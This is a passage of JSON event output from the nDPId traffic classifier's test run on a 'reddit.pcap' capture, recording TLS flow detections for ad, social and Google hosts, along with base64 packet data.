{"version":"TLSv1.2","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3517,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688324,"flow_last_seen":1605291688408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688336,"flow_last_seen":1605291688408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688344,"flow_last_seen":1605291688411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688411,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3906,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688611,"flow_last_seen":1605291688611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688611,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3906,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1605291688611,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688611,"pkt":"qtsDr8lk5EKm5WPyht1gDEO\/ACgGQCoBywEgSYsHmR3shSjf9ikmBigAATQaDRQpB0IHggC2mzgBu\/F3Z44AAAAAoAL9IIe6AAACBAWgBAIICvY2BR4AAAAAAQMDBw=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3908,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1605291688654,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688654,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNBoNFCkHQgeCALYqAcsBIEmLB5kd7IUo3\/YpAbubOJS20cTxd2ePoBJXgMFkAAACBAV4AQMDAwQCCArC10K+9jYFHg=="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3910,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1605291688654,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688654,"pkt":"qtsDr8lk5EKm5WPyht1gDEO\/ACAGQCoBywEgSYsHmR3shSjf9ikmBigAATQaDRQpB0IHggC2mzgBu\/F3Z4+UttHFgBAB+0VLAAABAQgK9jYFScLXQr4="} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3911,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688611,"flow_last_seen":1605291688654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3999,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688611,"flow_last_seen":1605291688705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1605291688705,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4030,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688712,"flow_last_seen":1605291688712,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688712,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4030,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1605291688712,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688712,"pkt":"qtsDr8lk5EKm5WPyht1gBqw+ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACAG1cYBu1QhHQQAAAAAoAL9IGnKAAACBAWgBAIICoWLJ5EAAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4145,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688749,"flow_last_seen":1605291688749,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688749,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4145,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1605291688749,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688749,"pkt":"qtsDr8lk5EKm5WPyht1gCJDMACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAE38IBu+NAO7IAAAAAoAL9ICgwAAACBAWgBAIICm3\/yPIAAAAAAQMDBw=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4156,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1605291688754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688754,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAYqAcsBIEmLB5kd7IUo3\/YpAbvVxjGyAqhUIR0FoBJXgNU8AAACBAV4AQMDAwQCCArC10MXhYsnkQ=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4158,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1605291688754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688754,"pkt":"qtsDr8lk5EKm5WPyht1gBqw+ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACAG1cYBu1QhHQUxsgKpgBAB+1kkAAABAQgKhYsnu8LXQxc="} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4161,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688712,"flow_last_seen":1605291688754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688754,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4267,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1605291688786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688786,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbvfwoEYYXPjQDuzoBJXgOVIAAACBAV4AQMDAwQCCArC10M\/bf\/I8g=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4268,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1605291688786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688786,"pkt":"qtsDr8lk5EKm5WPyht1gCJDMACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAE38IBu+NAO7OBGGF0gBAB+2k0AAABAQgKbf\/JGMLXQz8="} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4269,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688749,"flow_last_seen":1605291688786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688786,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4414,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688712,"flow_last_seen":1605291688813,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688813,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688830,"flow_last_seen":1605291688830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688830,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1605291688830,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688830,"pkt":"qtsDr8lk5EKm5WPyht1gBrB0ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAB4woBuyKqv5AAAAAAoAL9IFwjAAACBAWgBAIICu7gTZEAAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4499,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688831,"flow_last_seen":1605291688831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688831,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4499,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1605291688831,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688831,"pkt":"qtsDr8lk5EKm5WPyht1gDPOvACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACAWzEgBu0zLu+wAAAAAoAL9IM9TAAACBAWgBAIICkSadMcAAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4537,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688843,"flow_last_seen":1605291688843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688843,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4537,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1605291688843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688843,"pkt":"qtsDr8lk5EKm5WPyht1gAjZHACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMYBu5\/Vp\/oAAAAAoAL9IC3PAAACBAWgBAIICjfz93gAAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688843,"flow_last_seen":1605291688843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688843,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1605291688843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688843,"pkt":"qtsDr8lk5EKm5WPyht1gC3ZcACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMgBu1ulIdYAAAAAoAL9IPghAAACBAWgBAIICjfz93gAAAAAAQMDBw=="} +00991{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4539,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688749,"flow_last_seen":1605291688848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688848,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4815,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1605291688889,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688889,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgMAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbu4xvp17E2f1af7oBJXgOZHAAACBAV4AQMDAwQCCArC10OnN\/P3eA=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4816,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1605291688889,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688889,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgMAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbu4yD8lZERbpSHXoBJXgPP1AAACBAV4AQMDAwQCCArC10OmN\/P3eA=="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4820,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1605291688889,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688889,"pkt":"qtsDr8lk5EKm5WPyht1gAjZHACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMYBu5\/Vp\/v6dexOgBAB+2orAAABAQgKN\/P3psLXQ6c="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4821,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1605291688889,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688889,"pkt":"qtsDr8lk5EKm5WPyht1gC3ZcACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMgBu1ulIdc\/JWRFgBAB+3fZAAABAQgKN\/P3psLXQ6Y="} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4826,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4827,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4856,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1605291688893,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688893,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbvjCkXQfikiqr+RoBJXgDd0AAACBAV4AQMDAwQCCArC10OZ7uBNkQ=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4858,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1605291688893,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688893,"pkt":"qtsDr8lk5EKm5WPyht1gBrB0ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAB4woBuyKqv5FF0H4qgBAB+7tFAAABAQgK7uBN0cLXQ5k="} 